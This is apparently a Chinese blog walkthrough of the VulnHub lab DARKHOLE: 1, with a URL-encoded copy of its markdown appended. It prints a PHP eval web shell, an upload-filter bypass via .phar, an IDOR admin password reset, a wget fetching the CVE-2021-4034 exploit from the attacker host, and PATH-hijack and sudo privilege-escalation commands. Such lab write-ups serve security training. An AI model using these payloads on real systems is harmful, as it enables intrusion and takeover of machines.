准备

攻击机: kali,win11

靶机: DARKHOLE: 1 NAT 192.168.91.0 网段

下载链接:

https://www.vulnhub.com/entry/darkhole-1,724/

信息搜集与利用

主机发现

python3 ping.py -H 192.168.91.0/24


如图所示得到目标靶机IP地址: 192.168.91.190

端口扫描

nmap -sV -p- -A -T4 192.168.91.190 –oN darkhole1_nmap.txt


如图所示只开放了 22,80两个端口

目录扫描

扫描80端口
python3 dirsearch.py -u http://192.168.91.190/


如图所示扫描出了一些内容,挨个查看。

HTTP

http://192.168.91.190/
a01d378b6810c299b210d759381ed20f.png

http://192.168.91.190/config/

config目录下有 database.php, 不可见

http://192.168.91.190/config/database.php

http://192.168.91.190/dashboard.php

dashboard.php 显示 Not Allowed To access, 那么肯定要登陆过后才能查看

http://192.168.91.190/upload/

upload 目录下有一张图片

http://192.168.91.190/upload/d.jpg


图中女孩是(看来作者对对其情有独钟!有空去看一下她的电影)

http://192.168.91.190/register.php

注册用户页面

http://192.168.91.190/login.php

登陆页面


尝试弱口令登陆失败,去注册一个用户名: gakki:yyds_gakki

逻辑漏洞



此时发现url 地址 id=2,咱么大胆猜测一下管理员账户的 id=1, 那么我们尝试抓包越权修改管理员密码。



如图所示: Password Has been Updated, 现在尝试 admin:123456 登陆


如图所示:admin登陆成功,同时出现新的功能: Upload。

getshell

尝试上传一句话木马:

1
<?php eval($_POST[lbwnb]);?>



如图所示:很明显的可以看到只能上传后缀为:jpg,png,gif 三种图片格式,想办法绕过。

最后发现 直接将后缀改为 phar : yjh.phar 就能上传,然后蚁剑连接.

现在拿到一个 www-data 的 shell

cat /etc/passwd | grep “/bin/bash”



如图所示共三个用户具有 /bin/bash, root, darkhole, john

提权



进入 john 的家目录发现 第一个 flag : user.txt 很明晰是不能查看的,同时发现 toto 文件具有 SUID 权限,因此我们可以尝试 SUDI 提权。

方法一

同时索索一下是否有其他具有 SUID 的权限的命令或文件
find / -perm -u=s -type f 2>/dev/null


哈哈哈哈,在这里也可以看到 toto , 同时还有一个非常眼熟 的东西:

/usr/lib/policykit-1/polkit-agent-helper-1
CVE-2021-4034

这个漏洞 存在了十多年,于 2022年 1 月 25 日 才曝光出来,编写这篇 wp 的日期为: 2022年 2 月 17 日,同时这个靶机创建于 2021年 7 月 18 日,那么从时间节点来说这个漏洞能利用。当时这个漏洞没有曝光,所以在当时这个是没有危害的

exp链接:

https://github.com/berdav/CVE-2021-4034

将其clone 到 kali 中,在kali中 make 编译完成并打包,然后下载到靶机中,先在kali中编译是为了避免靶机中没有 make 命令。前段时间遇到过这个漏洞,可以参考我以前的文章(csdn,github 两个平台):

https://blog.csdn.net/Czheisenberg/article/details/122969392

https://www.ohhhhhh.top/2022/02/16/vulnhub靶场——CORROSION-2/

https://blog.csdn.net/Czheisenberg/article/details/122897376

https://www.ohhhhhh.top/2022/02/09/vulnhub靶场——THE-PLANETS-MERCURY/

在这里我直接使用它。

wget http://172.22.149.145:8000/CVE-2021-4034.zip


如图所示下载完成,现在 unzip 解压,然后进入目录,执行 ./cve-2021-4034 即可。



出意外了,运行没有反应,啪啪打脸来得太快。

测试发现为什么不行? 因为 蚁剑 的模拟终端的问题,解决办法只需要重新上传一个 后缀为 phar的马然后反弹的shell 即可执行 ./cve-2021-4034



这个shell 网上可以下载直接使用,节约时间。



如图所示浏览器点击即可,当然别忘了在 kali 中 开启监听哦



如图所示:在得到的新的 shell 中 成功运行了exp 得到了 root 权限, 由此可见这个漏洞有可能在一些机器中存在,毕竟今年才出现。

既然我们直接从 www-data 跳到了 root,所以直接查看两个 flag

flag 1

flag 2

方法二

不利用上面的漏洞,那个漏洞是非预期解。现在来看 john 用户目录下的 toto 文件,利用 toto SUID 提权!



如图所示:执行 ./toto 后 uid=1001(john) 但 gid,groups 没变。password 依然不能查看。

查看了一下网上的做法用 环境变量提权,这是我不知道的方法

1
2
3
4
echo '/bin/bash' > /tmp/id
chmod 777 /tmp/id
export PATH=/tmp:$PATH
./toto

如图所示:这样就能提权,我很懵逼。

参考链接:

https://xz.aliyun.com/t/2767

现在查看 john 的密码 password


我的天啦,这么简单的密码,还不如直接 ssh 爆破呢。

ssh 登陆

在这里我们就不看 flag 了,直接提权

sudo -l 查看当前用户可运行的文件或命令


如图所示:显示出了 john 家目录下的 file.py ,那我们看一下file.py 有什么


如图所示:发现 file.py 是空的。

既然这样,我们自己写内容然后通过它拿到 root 权限:

1
echo "import os;os.system('/bin/bash')" > file.py

然后运行即可:


如图所示直接运行不允许。那么我们把路径加上

sudo python3 /home/john/file.py


如图所示:成功拿到 root 权限。

总结

  1. CVE-2021-4034 影响很深。
  2. 初识 环境变量提权。
  3. 文件上传 getshell
%23%23%20%E5%87%86%E5%A4%87%0A%E6%94%BB%E5%87%BB%E6%9C%BA%3A%20kali%2Cwin11%0A%E9%9D%B6%E6%9C%BA%3A%20DARKHOLE%3A%201%20NAT%20192.168.91.0%20%E7%BD%91%E6%AE%B5%0A%E4%B8%8B%E8%BD%BD%E9%93%BE%E6%8E%A5%3A%0A%5Bhttps%3A%2F%2Fwww.vulnhub.com%2Fentry%2Fdarkhole-1%2C724%2F%5D(https%3A%2F%2Fwww.vulnhub.com%2Fentry%2Fdarkhole-1%2C724%2F)%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217103935.png)%0A%0A%23%23%20%E4%BF%A1%E6%81%AF%E6%90%9C%E9%9B%86%E4%B8%8E%E5%88%A9%E7%94%A8%0A%23%23%23%20%E4%B8%BB%E6%9C%BA%E5%8F%91%E7%8E%B0%0A%0A**python3%20ping.py%20-H%20192.168.91.0%2F24**%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217104234.png)%0A%E5%A6%82%E5%9B%BE%E6%89%80%E7%A4%BA%E5%BE%97%E5%88%B0%E7%9B%AE%E6%A0%87%E9%9D%B6%E6%9C%BAIP%E5%9C%B0%E5%9D%80%3A%20192.168.91.190%0A%0A%23%23%23%20%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F%0A**nmap%20-sV%20-p-%20-A%20-T4%20192.168.91.190%20--oN%20darkhole1_nmap.txt**%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217104906.png)%0A%E5%A6%82%E5%9B%BE%E6%89%80%E7%A4%BA%E5%8F%AA%E5%BC%80%E6%94%BE%E4%BA%86%2022%2C80%E4%B8%A4%E4%B8%AA%E7%AB%AF%E5%8F%A3%0A%0A%23%23%23%20%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F%0A%E6%89%AB%E6%8F%8F80%E7%AB%AF%E5%8F%A3%0A**python3%20dirsearch.py%20-u%20http%3A%2F%2F192.168.91.190%2F**%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217110140.png)%0A%E5%A6%82%E5%9B%BE%E6%89%80%E7%A4%BA%E6%89%AB%E6%8F%8F%E5%87%BA%E4%BA%86%E4%B8%80%E4%BA%9B%E5%86%85%E5%AE%B9%EF%BC%8C%E6%8C%A8%E4%B8%AA%E6%9F%A5%E7%9C%8B%E3%80%82%0A%0A%23%23%23%20HTTP%0A%5Bhttp%3A%2F%2F192.168.91.190%2F%5D(http%3A%2F%2F192.168.91.190%2F)%0A!%5Ba01d378b6810c299b210d759381ed20f.png%5D(en-resource%3A%2F%2Fdatabase%2F4561%3A1)%0A%0A%5Bhttp%3A%2F%2F192.168.91.190%2Fconfig%2F%5D(http%3A%2F%2F192.168.91.190%2Fconfig%2F)%0Aconfig%E7%9B%AE%E5%BD%95%E4%B8%8B%E6%9C%89%20database.php%2C%20%E4%B8%8D%E5%8F%AF%E8%A7%81%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217110936.png)%0A%5Bhttp%3A%2F%2F192.168.91.190%2Fconfig%2Fdatabase.php%5D(http%3A%2F%2F192.168.91.190%2Fconfig%2Fdatabase.php)%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217111014.png)%0A%0A%0A%5Bhttp%3A%2F%2F192.168.91.190%2Fdashboard.php%5D(http%3A%2F%2F192.168.91.190%2Fdashboard.php)%0Adashboard.php%20%E6%98%BE%E7%A4%BA%20Not%20Allowed%20To%20access%2C%20%E9%82%A3%E4%B9%88%E8%82%AF%E5%AE%9A%E8%A6%81%E7%99%BB%E9%99%86%E8%BF%87%E5%90%8E%E6%89%8D%E8%83%BD%E6%9F%A5%E7%9C%8B%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217111130.png)%0A%0A%5Bhttp%3A%2F%2F192.168.91.190%2Fupload%2F%5D(http%3A%2F%2F192.168.91.190%2Fupload%2F)%0Aupload%20%E7%9B%AE%E5%BD%95%E4%B8%8B%E6%9C%89%E4%B8%80%E5%BC%A0%E5%9B%BE%E7%89%87%0A%5Bhttp%3A%2F%2F192.168.91.190%2Fupload%2Fd.jpg%5D(http%3A%2F%2F192.168.91.190%2Fupload%2Fd.jpg)%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2Fd.jpg)%0A%E5%9B%BE%E4%B8%AD%E5%A5%B3%E5%AD%A9%E6%98%AF(%E7%9C%8B%E6%9D%A5%E4%BD%9C%E8%80%85%E5%AF%B9%E5%AF%B9%E5%85%B6%E6%83%85%E6%9C%89%E7%8B%AC%E9%92%9F%EF%BC%81%E6%9C%89%E7%A9%BA%E5%8E%BB%E7%9C%8B%E4%B8%80%E4%B8%8B%E5%A5%B9%E7%9A%84%E7%94%B5%E5%BD%B1)%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217111533.png)%0A%0A%5Bhttp%3A%2F%2F192.168.91.190%2Fregister.php%5D(http%3A%2F%2F192.168.91.190%2Fregister.php)%0A%E6%B3%A8%E5%86%8C%E7%94%A8%E6%88%B7%E9%A1%B5%E9%9D%A2%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217111816.png)%0A%5Bhttp%3A%2F%2F192.168.91.190%2Flogin.php%5D(http%3A%2F%2F192.168.91.190%2Flogin.php)%0A%E7%99%BB%E9%99%86%E9%A1%B5%E9%9D%A2%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217111900.png)%0A%E5%B0%9D%E8%AF%95%E5%BC%B1%E5%8F%A3%E4%BB%A4%E7%99%BB%E9%99%86%E5%A4%B1%E8%B4%A5%EF%BC%8C%E5%8E%BB%E6%B3%A8%E5%86%8C%E4%B8%80%E4%B8%AA%E7%94%A8%E6%88%B7%E5%90%8D%3A%20gakki%3Ayyds_gakki%0A%0A%23%23%23%20%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217112117.png)%0A%E6%AD%A4%E6%97%B6%E5%8F%91%E7%8E%B0url%20%E5%9C%B0%E5%9D%80%20id%3D2%EF%BC%8C%E5%92%B1%E4%B9%88%E5%A4%A7%E8%83%86%E7%8C%9C%E6%B5%8B%E4%B8%80%E4%B8%8B%E7%AE%A1%E7%90%86%E5%91%98%E8%B4%A6%E6%88%B7%E7%9A%84%20id%3D1%EF%BC%8C%20%E9%82%A3%E4%B9%88%E6%88%91%E4%BB%AC%E5%B0%9D%E8%AF%95%E6%8A%93%E5%8C%85%E8%B6%8A%E6%9D%83%E4%BF%AE%E6%94%B9%E7%AE%A1%E7%90%86%E5%91%98%E5%AF%86%E7%A0%81%E3%80%82%0A%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217122853.png)%0A%E5%A6%82%E5%9B%BE%E6%89%80%E7%A4%BA%3A%20Password%20Has%20been%20Updated%2C%20%E7%8E%B0%E5%9C%A8%E5%B0%9D%E8%AF%95%20admin%3A123456%20%E7%99%BB%E9%99%86%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217123028.png)%0A%E5%A6%82%E5%9B%BE%E6%89%80%E7%A4%BA%EF%BC%9Aadmin%E7%99%BB%E9%99%86%E6%88%90%E5%8A%9F%EF%BC%8C%E5%90%8C%E6%97%B6%E5%87%BA%E7%8E%B0%E6%96%B0%E7%9A%84%E5%8A%9F%E8%83%BD%3A%20Upload%E3%80%82%0A%0A%0A%23%23%23%20getshell%0A%E5%B0%9D%E8%AF%95%E4%B8%8A%E4%BC%A0%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC%3A%0A%60%60%60php%0A%3C%3Fphp%20eval(%24_POST%5Blbwnb%5D)%3B%3F%3E%0A%60%60%60%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217123833.png)%0A%E5%A6%82%E5%9B%BE%E6%89%80%E7%A4%BA%EF%BC%9A%E5%BE%88%E6%98%8E%E6%98%BE%E7%9A%84%E5%8F%AF%E4%BB%A5%E7%9C%8B%E5%88%B0%E5%8F%AA%E8%83%BD%E4%B8%8A%E4%BC%A0%E5%90%8E%E7%BC%80%E4%B8%BA%EF%BC%9Ajpg%2Cpng%2Cgif%20%E4%B8%89%E7%A7%8D%E5%9B%BE%E7%89%87%E6%A0%BC%E5%BC%8F%EF%BC%8C%E6%83%B3%E5%8A%9E%E6%B3%95%E7%BB%95%E8%BF%87%E3%80%82%0A%E6%9C%80%E5%90%8E%E5%8F%91%E7%8E%B0%20%E7%9B%B4%E6%8E%A5%E5%B0%86%E5%90%8E%E7%BC%80%E6%94%B9%E4%B8%BA%20phar%20%3A%20yjh.phar%20%E5%B0%B1%E8%83%BD%E4%B8%8A%E4%BC%A0%EF%BC%8C%E7%84%B6%E5%90%8E%E8%9A%81%E5%89%91%E8%BF%9E%E6%8E%A5.%0A%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217130709.png)%0A%0A%E7%8E%B0%E5%9C%A8%E6%8B%BF%E5%88%B0%E4%B8%80%E4%B8%AA%20www-data%20%E7%9A%84%20shell%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217130933.png)%0A%0A**cat%20%2Fetc%2Fpasswd%20%7C%20grep%20%22%2Fbin%2Fbash%22**%0A%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217131146.png)%0A%E5%A6%82%E5%9B%BE%E6%89%80%E7%A4%BA%E5%85%B1%E4%B8%89%E4%B8%AA%E7%94%A8%E6%88%B7%E5%85%B7%E6%9C%89%20%2Fbin%2Fbash%2C%20root%2C%20darkhole%2C%20john%20%0A%0A%23%23%23%20%E6%8F%90%E6%9D%83%0A%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217131324.png)%0A%E8%BF%9B%E5%85%A5%20john%20%E7%9A%84%E5%AE%B6%E7%9B%AE%E5%BD%95%E5%8F%91%E7%8E%B0%20%E7%AC%AC%E4%B8%80%E4%B8%AA%20flag%20%3A%20user.txt%20%E5%BE%88%E6%98%8E%E6%99%B0%E6%98%AF%E4%B8%8D%E8%83%BD%E6%9F%A5%E7%9C%8B%E7%9A%84%EF%BC%8C%E5%90%8C%E6%97%B6%E5%8F%91%E7%8E%B0%20toto%20%E6%96%87%E4%BB%B6%E5%85%B7%E6%9C%89%20SUID%20%E6%9D%83%E9%99%90%EF%BC%8C%E5%9B%A0%E6%AD%A4%E6%88%91%E4%BB%AC%E5%8F%AF%E4%BB%A5%E5%B0%9D%E8%AF%95%20SUDI%20%E6%8F%90%E6%9D%83%E3%80%82%0A%0A%23%23%23%20%E6%96%B9%E6%B3%95%E4%B8%80%0A%E5%90%8C%E6%97%B6%E7%B4%A2%E7%B4%A2%E4%B8%80%E4%B8%8B%E6%98%AF%E5%90%A6%E6%9C%89%E5%85%B6%E4%BB%96%E5%85%B7%E6%9C%89%20SUID%20%E7%9A%84%E6%9D%83%E9%99%90%E7%9A%84%E5%91%BD%E4%BB%A4%E6%88%96%E6%96%87%E4%BB%B6%0A**find%20%2F%20-perm%20-u%3Ds%20-type%20f%202%3E%2Fdev%2Fnull**%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217131701.png)%0A%E5%93%88%E5%93%88%E5%93%88%E5%93%88%EF%BC%8C%E5%9C%A8%E8%BF%99%E9%87%8C%E4%B9%9F%E5%8F%AF%E4%BB%A5%E7%9C%8B%E5%88%B0%20toto%20%EF%BC%8C%20%E5%90%8C%E6%97%B6%E8%BF%98%E6%9C%89%E4%B8%80%E4%B8%AA%E9%9D%9E%E5%B8%B8%E7%9C%BC%E7%86%9F%20%E7%9A%84%E4%B8%9C%E8%A5%BF%3A%20%0A%0A**%2Fusr%2Flib%2Fpolicykit-1%2Fpolkit-agent-helper-1**%0A**CVE-2021-4034**%0A%E8%BF%99%E4%B8%AA%E6%BC%8F%E6%B4%9E%20%E5%AD%98%E5%9C%A8%E4%BA%86%E5%8D%81%E5%A4%9A%E5%B9%B4%EF%BC%8C%E4%BA%8E%202022%E5%B9%B4%201%20%E6%9C%88%2025%20%E6%97%A5%20%E6%89%8D%E6%9B%9D%E5%85%89%E5%87%BA%E6%9D%A5%EF%BC%8C%E7%BC%96%E5%86%99%E8%BF%99%E7%AF%87%20wp%20%E7%9A%84%E6%97%A5%E6%9C%9F%E4%B8%BA%3A%202022%E5%B9%B4%202%20%E6%9C%88%2017%20%E6%97%A5%EF%BC%8C%E5%90%8C%E6%97%B6%E8%BF%99%E4%B8%AA%E9%9D%B6%E6%9C%BA%E5%88%9B%E5%BB%BA%E4%BA%8E%202021%E5%B9%B4%207%20%E6%9C%88%2018%20%E6%97%A5%EF%BC%8C%E9%82%A3%E4%B9%88%E4%BB%8E%E6%97%B6%E9%97%B4%E8%8A%82%E7%82%B9%E6%9D%A5%E8%AF%B4%E8%BF%99%E4%B8%AA%E6%BC%8F%E6%B4%9E%E8%83%BD%E5%88%A9%E7%94%A8%E3%80%82%E5%BD%93%E6%97%B6%E8%BF%99%E4%B8%AA%E6%BC%8F%E6%B4%9E%E6%B2%A1%E6%9C%89%E6%9B%9D%E5%85%89%EF%BC%8C%E6%89%80%E4%BB%A5%E5%9C%A8%E5%BD%93%E6%97%B6%E8%BF%99%E4%B8%AA%E6%98%AF%E6%B2%A1%E6%9C%89%E5%8D%B1%E5%AE%B3%E7%9A%84%0A%0Aexp%E9%93%BE%E6%8E%A5%3A%0A%5Bhttps%3A%2F%2Fgithub.com%2Fberdav%2FCVE-2021-4034%5D(https%3A%2F%2Fgithub.com%2Fberdav%2FCVE-2021-4034)%0A%E5%B0%86%E5%85%B6clone%20%E5%88%B0%20kali%20%E4%B8%AD%EF%BC%8C%E5%9C%A8kali%E4%B8%AD%20make%20%E7%BC%96%E8%AF%91%E5%AE%8C%E6%88%90%E5%B9%B6%E6%89%93%E5%8C%85%EF%BC%8C%E7%84%B6%E5%90%8E%E4%B8%8B%E8%BD%BD%E5%88%B0%E9%9D%B6%E6%9C%BA%E4%B8%AD%EF%BC%8C%E5%85%88%E5%9C%A8kali%E4%B8%AD%E7%BC%96%E8%AF%91%E6%98%AF%E4%B8%BA%E4%BA%86%E9%81%BF%E5%85%8D%E9%9D%B6%E6%9C%BA%E4%B8%AD%E6%B2%A1%E6%9C%89%20make%20%E5%91%BD%E4%BB%A4%E3%80%82%E5%89%8D%E6%AE%B5%E6%97%B6%E9%97%B4%E9%81%87%E5%88%B0%E8%BF%87%E8%BF%99%E4%B8%AA%E6%BC%8F%E6%B4%9E%EF%BC%8C%E5%8F%AF%E4%BB%A5%E5%8F%82%E8%80%83%E6%88%91%E4%BB%A5%E5%89%8D%E7%9A%84%E6%96%87%E7%AB%A0(csdn%2Cgithub%20%E4%B8%A4%E4%B8%AA%E5%B9%B3%E5%8F%B0)%3A%0A%5Bhttps%3A%2F%2Fblog.csdn.net%2FCzheisenberg%2Farticle%2Fdetails%2F122969392%5D(https%3A%2F%2Fblog.csdn.net%2FCzheisenberg%2Farticle%2Fdetails%2F122969392)%0A%5Bhttps%3A%2F%2Fwww.ohhhhhh.top%2F2022%2F02%2F16%2Fvulnhub%E9%9D%B6%E5%9C%BA%E2%80%94%E2%80%94CORROSION-2%2F%5D(https%3A%2F%2Fwww.ohhhhhh.top%2F2022%2F02%2F16%2Fvulnhub%25E9%259D%25B6%25E5%259C%25BA%25E2%2580%2594%25E2%2580%2594CORROSION-2%2F)%0A%5Bhttps%3A%2F%2Fblog.csdn.net%2FCzheisenberg%2Farticle%2Fdetails%2F122897376%5D(https%3A%2F%2Fblog.csdn.net%2FCzheisenberg%2Farticle%2Fdetails%2F122897376)%0A%5Bhttps%3A%2F%2Fwww.ohhhhhh.top%2F2022%2F02%2F09%2Fvulnhub%E9%9D%B6%E5%9C%BA%E2%80%94%E2%80%94THE-PLANETS-MERCURY%2F%5D(https%3A%2F%2Fwww.ohhhhhh.top%2F2022%2F02%2F09%2Fvulnhub%25E9%259D%25B6%25E5%259C%25BA%25E2%2580%2594%25E2%2580%2594THE-PLANETS-MERCURY%2F)%0A%0A%E5%9C%A8%E8%BF%99%E9%87%8C%E6%88%91%E7%9B%B4%E6%8E%A5%E4%BD%BF%E7%94%A8%E5%AE%83%E3%80%82%0A%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217133209.png)%0A%0A**wget%20http%3A%2F%2F172.22.149.145%3A8000%2FCVE-2021-4034.zip**%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217133432.png)%0A%E5%A6%82%E5%9B%BE%E6%89%80%E7%A4%BA%E4%B8%8B%E8%BD%BD%E5%AE%8C%E6%88%90%EF%BC%8C%E7%8E%B0%E5%9C%A8%20unzip%20%E8%A7%A3%E5%8E%8B%EF%BC%8C%E7%84%B6%E5%90%8E%E8%BF%9B%E5%85%A5%E7%9B%AE%E5%BD%95%EF%BC%8C%E6%89%A7%E8%A1%8C%20.%2Fcve-2021-4034%20%E5%8D%B3%E5%8F%AF%E3%80%82%0A%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217134225.png)%0A%E5%87%BA%E6%84%8F%E5%A4%96%E4%BA%86%EF%BC%8C%E8%BF%90%E8%A1%8C%E6%B2%A1%E6%9C%89%E5%8F%8D%E5%BA%94%EF%BC%8C%E5%95%AA%E5%95%AA%E6%89%93%E8%84%B8%E6%9D%A5%E5%BE%97%E5%A4%AA%E5%BF%AB%E3%80%82%0A%E6%B5%8B%E8%AF%95%E5%8F%91%E7%8E%B0%E4%B8%BA%E4%BB%80%E4%B9%88%E4%B8%8D%E8%A1%8C%EF%BC%9F%20%E5%9B%A0%E4%B8%BA%20%E8%9A%81%E5%89%91%20%E7%9A%84%E6%A8%A1%E6%8B%9F%E7%BB%88%E7%AB%AF%E7%9A%84%E9%97%AE%E9%A2%98%EF%BC%8C%E8%A7%A3%E5%86%B3%E5%8A%9E%E6%B3%95%E5%8F%AA%E9%9C%80%E8%A6%81%E9%87%8D%E6%96%B0%E4%B8%8A%E4%BC%A0%E4%B8%80%E4%B8%AA%20%E5%90%8E%E7%BC%80%E4%B8%BA%20phar%E7%9A%84%E9%A9%AC%E7%84%B6%E5%90%8E%E5%8F%8D%E5%BC%B9%E7%9A%84shell%20%E5%8D%B3%E5%8F%AF%E6%89%A7%E8%A1%8C%20.%2Fcve-2021-4034%0A%0A%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217140836.png)%0A%E8%BF%99%E4%B8%AAshell%20%E7%BD%91%E4%B8%8A%E5%8F%AF%E4%BB%A5%E4%B8%8B%E8%BD%BD%E7%9B%B4%E6%8E%A5%E4%BD%BF%E7%94%A8%EF%BC%8C%E8%8A%82%E7%BA%A6%E6%97%B6%E9%97%B4%E3%80%82%0A%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217140913.png)%0A%E5%A6%82%E5%9B%BE%E6%89%80%E7%A4%BA%E6%B5%8F%E8%A7%88%E5%99%A8%E7%82%B9%E5%87%BB%E5%8D%B3%E5%8F%AF%EF%BC%8C%E5%BD%93%E7%84%B6%E5%88%AB%E5%BF%98%E4%BA%86%E5%9C%A8%20kali%20%E4%B8%AD%20%E5%BC%80%E5%90%AF%E7%9B%91%E5%90%AC%E5%93%A6%0A%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217141023.png)%0A%E5%A6%82%E5%9B%BE%E6%89%80%E7%A4%BA%EF%BC%9A%E5%9C%A8%E5%BE%97%E5%88%B0%E7%9A%84%E6%96%B0%E7%9A%84%20shell%20%E4%B8%AD%20%E6%88%90%E5%8A%9F%E8%BF%90%E8%A1%8C%E4%BA%86exp%20%E5%BE%97%E5%88%B0%E4%BA%86%20root%20%E6%9D%83%E9%99%90%2C%20%E7%94%B1%E6%AD%A4%E5%8F%AF%E8%A7%81%E8%BF%99%E4%B8%AA%E6%BC%8F%E6%B4%9E%E6%9C%89%E5%8F%AF%E8%83%BD%E5%9C%A8%E4%B8%80%E4%BA%9B%E6%9C%BA%E5%99%A8%E4%B8%AD%E5%AD%98%E5%9C%A8%EF%BC%8C%E6%AF%95%E7%AB%9F%E4%BB%8A%E5%B9%B4%E6%89%8D%E5%87%BA%E7%8E%B0%E3%80%82%0A%0A%E6%97%A2%E7%84%B6%E6%88%91%E4%BB%AC%E7%9B%B4%E6%8E%A5%E4%BB%8E%20www-data%20%E8%B7%B3%E5%88%B0%E4%BA%86%20root%EF%BC%8C%E6%89%80%E4%BB%A5%E7%9B%B4%E6%8E%A5%E6%9F%A5%E7%9C%8B%E4%B8%A4%E4%B8%AA%20flag%20%0A%23%23%23%23%20flag%201%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217141643.png)%0A%0A%23%23%23%23%20flag%202%0A%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217141458.png)%0A%0A%0A%23%23%23%20%E6%96%B9%E6%B3%95%E4%BA%8C%0A%0A%E4%B8%8D%E5%88%A9%E7%94%A8%E4%B8%8A%E9%9D%A2%E7%9A%84%E6%BC%8F%E6%B4%9E%EF%BC%8C%E9%82%A3%E4%B8%AA%E6%BC%8F%E6%B4%9E%E6%98%AF%E9%9D%9E%E9%A2%84%E6%9C%9F%E8%A7%A3%E3%80%82%E7%8E%B0%E5%9C%A8%E6%9D%A5%E7%9C%8B%20john%20%E7%94%A8%E6%88%B7%E7%9B%AE%E5%BD%95%E4%B8%8B%E7%9A%84%20toto%20%E6%96%87%E4%BB%B6%2C%E5%88%A9%E7%94%A8%20toto%20SUID%20%E6%8F%90%E6%9D%83%EF%BC%81%0A%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217174402.png)%0A%E5%A6%82%E5%9B%BE%E6%89%80%E7%A4%BA%EF%BC%9A%E6%89%A7%E8%A1%8C%20.%2Ftoto%20%E5%90%8E%20uid%3D1001(john)%20%E4%BD%86%20gid%2Cgroups%20%E6%B2%A1%E5%8F%98%E3%80%82password%20%E4%BE%9D%E7%84%B6%E4%B8%8D%E8%83%BD%E6%9F%A5%E7%9C%8B%E3%80%82%0A%0A%E6%9F%A5%E7%9C%8B%E4%BA%86%E4%B8%80%E4%B8%8B%E7%BD%91%E4%B8%8A%E7%9A%84%E5%81%9A%E6%B3%95%E7%94%A8%20%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F%E6%8F%90%E6%9D%83%EF%BC%8C%E8%BF%99%E6%98%AF%E6%88%91%E4%B8%8D%E7%9F%A5%E9%81%93%E7%9A%84%E6%96%B9%E6%B3%95%0A!%5B%5D(https%3A%2F%2Fgitee.com%2Fczheisenberg%2Fblog-imgs%2Fraw%2Fmaster%2Fimgs%2F20220217180935.png)%0A%60%60%60shell%0Aecho%20'%2Fbin%2Fbash'%20%3E%20%2Ftmp%2Fid%0Achmod%20777%20%2Ftmp%2Fid%0Aexport%20PATH%3D%2Ftmp%3A%24PATH%0A.%2Ftoto%0A%60%60%60%0A